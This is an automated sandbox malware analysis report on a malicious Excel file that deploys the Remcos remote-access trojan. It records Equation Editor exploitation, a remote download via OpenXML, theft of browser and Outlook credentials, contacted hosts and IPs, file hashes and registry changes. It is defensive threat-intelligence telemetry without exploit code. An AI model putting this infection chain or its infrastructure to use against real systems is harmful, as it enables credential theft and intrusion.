Malware Analysis Report

2025-01-02 03:19

Sample ID 240326-s4zq5sdc96
Target Order request list.xls
SHA256 3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9
Tags
remcos remotehost collection rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3ac1e9bc1c29e4f900a34d8e98672106887155015c3d868eb35b18a546f64af9

Threat Level: Known bad

The file Order request list.xls was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection rat spyware stealer

Remcos

Nirsoft

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Abuses OpenXML format to download file from external location

Reads user/profile data of web browsers

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy WMI provider

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 15:41

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-26 15:41

Reported

2024-03-26 15:44

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

136s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3884 wrote to memory of 3464 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 3884 wrote to memory of 3464 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -Embedding

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 2s.gg udp
FR 13.105.221.26:80 2s.gg tcp
FR 13.105.221.26:443 2s.gg tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.221.105.13.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 154.38.188.98:80 154.38.188.98 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 98.188.38.154.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/3024-2-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-3-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-1-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-0-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-5-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-6-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-7-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-4-0x00007FFEB04B0000-0x00007FFEB04C0000-memory.dmp

memory/3024-8-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-9-0x00007FFEADEA0000-0x00007FFEADEB0000-memory.dmp

memory/3024-10-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-12-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-11-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-13-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-14-0x00007FFEADEA0000-0x00007FFEADEB0000-memory.dmp

memory/3024-15-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-16-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-17-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-18-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-19-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-20-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-21-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-22-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-26-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-45-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-48-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-49-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-50-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-51-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-52-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-54-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-55-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-57-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-58-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-59-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-60-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-62-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-63-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ECA74084-DAEC-4D17-8250-DECFD9EADE13

MD5 fa56eb7425da9458f604484bf1d9a41c
SHA1 91b3c85210114ef1dde2ddbdecaba72099260181
SHA256 aca644b9e5b31c6d97d8e2b06a31b41cee485e81c0218ea7afe7b39852bcb83e
SHA512 320abd9789fa25c535301000e3014ec656e892d46eec01595d510d4e812507eb98f35b339cda83f058cbb9d6b6f495f199e6576c90da60ca20888712aa3ce790

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

MD5 4a7227f9c12dd0ef0bbb96c0497bbe3c
SHA1 4b1c7b0b2563916c4f6db17e0bb8d150b2ebf66f
SHA256 340cbcdd0f2590570ad87dbc82d84e477f3d27deae1b16f5815df9a7410ce121
SHA512 0097718d817ff1e7adb1d0e113ea30c2b02aa3af8bbbc4a87de9e540b209883754da0acd07d48d4b368faedfa49c57aa053a7dde464e0aba81253b028491b758

memory/3884-65-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-66-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 4306c238aaa13d7442227922e4d31f87
SHA1 1827e8f5d94e78efb120c44549950346edd1e1ee
SHA256 9e4d66939f6e667f48a0461d9a545cdba62e1eec13eb8732d8e7c2bf28dadb5e
SHA512 58b2dba07ca036a422e786ce66710459f66fc23d756bd9f0c4c69709d9ccf7e3168c5e4b5265ea2eddd56389c9123510e7c0641c2ca33973fc85e748c89fbdd8

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\K4KS10IH\kissinggreatwaytounderstandhowimkissingherwithlotofhearttounderstandyouaremygirliloveu_____sweethearttounderstandkissingmygirl[1].doc

MD5 338da1470f51aa8116271555ee990e96
SHA1 0e1cb790e5bc6534c8757794512a8394a1f12d13
SHA256 c02d7beb9210e4edc9fad4c7de3a6827994343e249d3f7544632d8f64847dc74
SHA512 00a79d3fb886066e5f701386e445457fa489b2a63083b75a2d8ae05965cdd21ac7a11dd5267950da882b4bd89d44860506cd650b57e138d96fff353b33919039

memory/3024-86-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3024-87-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

memory/3884-88-0x00007FFEF0430000-0x00007FFEF0625000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 15:41

Reported

2024-03-26 15:44

Platform

win7-20240221-en

Max time kernel

149s

Max time network

131s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

Signatures

Remcos

rat remcos

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Abuses OpenXML format to download file from external location

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
